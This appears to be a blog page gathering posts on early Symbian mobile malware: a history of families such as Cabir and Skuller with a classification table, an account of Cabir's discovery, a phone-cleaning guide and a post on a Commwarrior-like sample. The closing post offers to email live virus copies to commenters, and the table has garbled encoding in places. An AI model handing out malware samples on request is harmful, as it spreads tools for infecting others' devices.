messages to telephone numbers in the address book, meaning that the
user’s phone bill will increase. In fact, Mosquit.a wasn’t only the
first Trojan for smartphones, but also the first piece of adware for
mobiles.

Skuller.a, a Trojan which appeared in November 2004, was the first of
what is now the largest family of mobile Trojans. This was the first
malicious program to take advantage of the design faults of Symbian,
which make it possible for any application to overwrite system files
with their own files without prompting the user. Skuller replaced
application icons with skull and crossbones, and also deleted
application files. As a result, the handset would stop working once it
had been switched off and switched on again. This type of “vandal
Trojan” became one of the most popular among virus writers.



Skuller.a

Three new variants of Cabir appeared practically at the same time as
Skuller.a. These new variants were not based on the source code of the
original worm. By this time virus writers had got their hands on Cabir,
and some of them did what script kiddies do: they renamed the worm
files and replaced some of the text in the files with their own. One
variant added Skuller to the original archive. The resulting hybrid
didn’t function as intended: the worm was unable to replicate because
the Trojan crashed the phone. However, this was the first time that
Cabir was used as a carrier for other malicious programs.

By the beginning of 2005, the main types of mobile malware had
evolved, and were used by virus writers over the next eighteen months:

  • worms that spread via smartphone protocols and services
  • vandal Trojans that install themselves to the system by exploiting Symbian design faults
  • Trojans designed for financial gain

However, although there are only a few main types of behavior, in
practice mobile malware comes in a variety of forms. Kaspersky Lab is
currently tracking 31 distinct mobile malware families. The table below
shows the main characteristics for each family.

Name Date OS Functionality Technology used Number of variants
Worm.SymbOS.Cabir June 2004 Symbian Spreads via Bluetooth Bluetooth 15
Virus.WinCE.Duts July 2004 Windows CE Infects files (File API) 1
Backdoor.WinCE.Brador August 2004 Windows CE Provides remote network access (Network API) 2
Trojan.SymbOS.Mosquit August 2004 Symbian Sends SMS messages SMS 1
Trojan.SymbOS.Skuller November 2004 Symbian Replaces files, icons, system applications OS vulnerability 31
Worm.SymbOS.Lasco January 2005 Symbian Spreads via Bluetooth, infects files Bluetooth, File API 1
Trojan.SymbOS.Locknut February 2005 Symbian Installs corrupted applications OS vulnerability 2
Trojan.SymbOS.Dampig March 2005 Symbian Replaces system applications OS vulnerability 1
Worm.SymbOS.ComWar March 2005 Symbian Spreads via Bluetooth and MMS, infects files Bluetooth, MMS, File API 7
Trojan.SymbOS.Drever March 2005 Symbian Replaces antivirus application loaders OS vulnerability 4
Trojan.SymbOS.Fontal April 2005 Symbian Replaces font files OS vulnerability 8
Trojan.SymbOS.Hobble April 2005 Symbian Replaces system applications OS vulnerability 1
Trojan.SymbOS.Appdisabler Ìàé 2005 Symbian Replaces system applications OS vulnerability 6
Trojan.SymbOS.Doombot May 2005 Symbian Replaces system applications, èíñòàëëÿöèÿ Comwar OS vulnerability 17
Trojan.SymbOS.Blankfont July 2005 Symbian Replaces font files OS vulnerability 1
Trojan.SymbOS.Skudoo August 2005 Symbian Installs damaged applications, installs Cabir, Skuller, Doombor OS vulnerability 3
Trojan.SymbOS.Singlejump August 2005 Symbian Disables system functions, replaces icons OS vulnerability 5
Trojan.SymbOS.Bootton August 2005 Symbian Installs damaged applications, installs Cabir OS vulnerability 2
Trojan.SymbOS.Cardtrap September 2005 Symbian Deletes antivirus files, replaces system applications, installs Win32 malware on memory cards OS vulnerability 26
Trojan.SymbOS.Cardblock October 2005 Symbian Blocks memory cards, deletes folders OS vulnerability, File API 1
Trojan.SymbOS.Pbstealer November 2005 Symbian Steals data Bluetooth, File API 5
Trojan-Dropper.SymbOS.Agent December 2005 Symbian Installs other malicious programs OS vulnerability 3
Trojan-SMS.J2ME.RedBrowser February 2006 J2ME Sends SMS Java, SMS 2
Worm.MSIL.Cxover March 2006 Windows Mobile/ .NET Deletes files, copies its body to other devices File (API), NetWork (API) 1
Worm.SymbOS.StealWar March 2006 Symbian Steals data, spreads via Bluetooth and MMS Bluetooth, MMS, File (API) 5
Email-Worm.MSIL.Letum March 2006 Windows Mobile/ .NET Spreads via email Email, File (API) 3
Trojan-Spy.SymbOS.Flexispy April 2006 Symbian Steals data 2
Trojan.SymbOS.Rommwar April 2006 Symbian Replaces system applications OS vulnerability 4
Trojan.SymbOS.Arifat April 2006 Symbian 1
Trojan.SymbOS.Romride June 2006 Symbian Replaces system applications OS vulnerability 8
Worm.SymbOS.Mobler.a August 2006 Symbian Deletes antivirus files, replaces system applications, spreads via memory card OS vulnerability 1
31 families, 170 variants


Complete (as of 30th August 2006) list of mobile virus families according to Kaspersky Lab classification



 “What can mobile viruses do?”:

  • Spread via Bluetooth, MMS
  • Send SMS messages
  • Infect files
  • Enable remote control of the smartphone
  • Modify or replace icons or system applications
  • Install “false” or non-operational fonts and applications
  • Combat antivirus programs
  • Install other malicious programs
  • Block memory cards
  • Steal data

We have to acknowledge that today’s mobile viruses are very similar
to computer viruses in terms of their payload. However, it took computer
viruses over twenty years to evolve, and mobile viruses have covered
the same ground in a mere two years. Without doubt, mobile malware is
the most quickly evolving type of malicious code, and clearly still has
great potential for further evolution.

Symbian Cabir Virus

Posted by glewoCROW 2:19 AM, under ,, | No comments

On June 14, 2004, a well-known Spanish virus collector known as
VirusBuster, who had close links with some virus writers, sent a message
to newvirus@kaspersky.com. The message had a file called caribe.sis
attached. A quick analysis showed that it was
an application for Symbian OS and also an installer archive containing
other files. As a rule, virus analysts deal with files created for
traditional x86 processors. The files in caribe.sis were applications
for ARM, processors which are used in a range of devices, including
mobile phones. Initially, we knew very little about the machine language
used by that processor, but within a few hours our analysts had managed
to familiarize themselves with it. The purpose of the files was then
clear: this was a worm for mobile phones which spread via Bluetooth.
Our conclusions were fully confirmed the next day when we tested the
worm on a Nokia N-Gage telephone running Symbian.

The worm was written by someone going under the name of Vallez. As
far as we know, he lives in France and was, at the time, a member of a
group of virus writers called 29A. The groups aim was to create
proof-of-concept virus code for non-standard operating systems and
applications. Back in June 2004, the
objective was to create a malicious program for smartphones. The author
also chose a non-standard replication method - analysts are used to
worms which spread via email, and Cabir could have been expected to
propagate in the same way, given that Internet connectivity and email
are two of the main features of smartphones. However, the worms author
chose Bluetooth instead; an approach that turned out to be key.

Cabir is coded for the Symbian operating system, which was, and
remains, the most commonly used operating system in mobile phones. This
marker leader position is due largely to the fact that all smartphones
produced by Nokia are Symbian-based. In fact, Symbian+Nokia is currently
the standard smartphone combination, and it's going to take Windows
Mobile a long time to win a significant share of the market from
Symbian.

The appearance of Cabir confirmed the law of computer virus
evolution. In order for malicious programs targeting a particular
operating system or platform to emerge, three conditions need to be
fulfilled:

  1. The platform must be popular. Symbian was and remains the most popular platform for smartphones, with tens of millions of users throughout the world.

    Symbian could be a very extended
    operating system used in mobile phones in the future. Today is the more
    extended and in my opinion it could be more yet (M$ is fighting too for
    being into this market too).”



  2. There must be well-documented development tools for the application.
  3. Caribe was written in c++. Symbian/nokia is giving us a complete sdk for developing applications for symbian operating system.”

  4. The presence of vulnerabilities or coding errors.
    Symbian includes a number of faults, by design, in the system that
    handles files and services. In the case of Cabir these faults were not
    exploited, but most of todays Trojans for smartphones take full
    advantage of them.


Cabir immediately attracted the attention not only of antivirus
companies, but of other virus writers as well. The latest issue of
29A's webzine was eagerly awaited, with the expectation that the group
would, in accordance with tradition, publish the worms source code.
Naturally, the publication of the source code would lead to the
emergence of new, more harmful variants of the worm: this is what always
happens when script kiddies gain access to such technologies. However,
petty cyber criminals can be capable of doing a lot of damage even
without access to original source code.

HOW TO REMOVE SYMBIAN (S60 v1 AND S60v2) VIRUS INFECTION?

Posted by glewoCROW 1:20 AM, under ,,, | No comments

The easiest and sure shot way of removing most mobile (S60 1st and 2nd edition only) viruses is to format the phone and memory card both.
Because the virus usually runs as a system process and resides in the memory, one cannot delete all the files related with virus while the phone is on. Usually virus related files have bizarre names (Like kktuqwe.exe, gdv.mdl etc) with extensions .exe .mdl and/or .sis. With the help of X-plore these files can be located in C:\(root) C:\System\Recogs, C:\System\Programs, C:\System\Apps, E:\(Root), E:\System\Apps, E:\System\Recogs, E:\System\Programs (And other hidden system folders). You can find and delete them easily but unfortunately the virus (That is still running) will recreate them instantly. So the best way is to format the phone, however formatting the Memory card is optional.

1. Before formatting the phone, backup your contacts and other data on memory card and/or PC. Now remove the memory card and format the phone.
2. If you don’t want to format the memory card then remove it before formatting the phone. Now connect it to your PC and scan with a good antivirus (Avast is the best and free antivirus that detects and removes most mobile viruses). Delete any infection detected. DO NOT re-insert the memory card before formatting the phone otherwise the virus will again infect it.
3. If you want to format memory card also, format it through PC first and then reformat it through formatted phone.

NOTE: If you can’t see hidden files in X-plore then proceed as follows
1. Run X-plore,
2. Press 0 (Zero) on keypad (Or go to Menu/Tools/Configuration)
3. Check the first 4 boxes
Press back and now you can see the hidden system files.

Most of the mobile antiviruses, I used to remove the virus, failed miserably, may be they are still not as good as their desktop counterparts. So in my opinion having an antivirus running on your Symbian phone (Having meager RAM) will do nothing but to slow down the device. One more reason for not having a mobile antivirus is that mobile viruses are not as sophisticated and sneaky as their Windows siblings and they just cannot enter your phone without your permission. So it’s all up to you that with a little precaution you can keep your mobile clean and healthy.

PLAYING GAMES WITH SYMBIAN VIRUS

Posted by glewoCROW 12:59 AM, under ,, | No comments

Yesterday I came across a Symbian virus (With which my cousin’s Nokia N70 was infected). I analyzed its files (with the help of X-plore) and effects on phone. Avast antivirus showed its sis file as Malware/Virus on scanning (It is probably a variant of Commwarrior – One of the first mobile viruses known). This virus appeared to be not as damaging to the phone as some of its siblings (Skulls, Cabir etc). However it caused the phone hang frequently, slowing it down and draining battery too fast. It also automatically replicates and sends its copies (In the form of installable sis files) to other phones (Who have Bluetooth “On”). Now have a look at the names of sis files it sends – “girl.jpg”, “sex.3gp” etc (All showing fake extensions); a funny and “sexy” virus indeed.
I am really impressed with the creativity of the programmer of this virus (Had he made a good application rather than this crap, he would have become a famous and successful developer by now). Because the above names are so attention grabbing, anyone will install it and get infected easily. So prevention is the best way to avoid infection and the three golden rules of prevention are –
1. ALWAYS Keep your Bluetooth Off and On it only when required.
2. DO NOT open any message that is in the form of sis, jar, exe or any other installation format unless you know from where it came and what it is.
3. DO NOT EVER accept Bluetooth connection request from a suspicious source.

I kept some copies of this virus to understand Symbian virus architecture. Anyone interested (Specially developers) can get it from me. Just leave your request in the comment with your mail ID and I will send it to you. But please don’t use it with bad intention and I won’t be responsible for any damages whatsoever.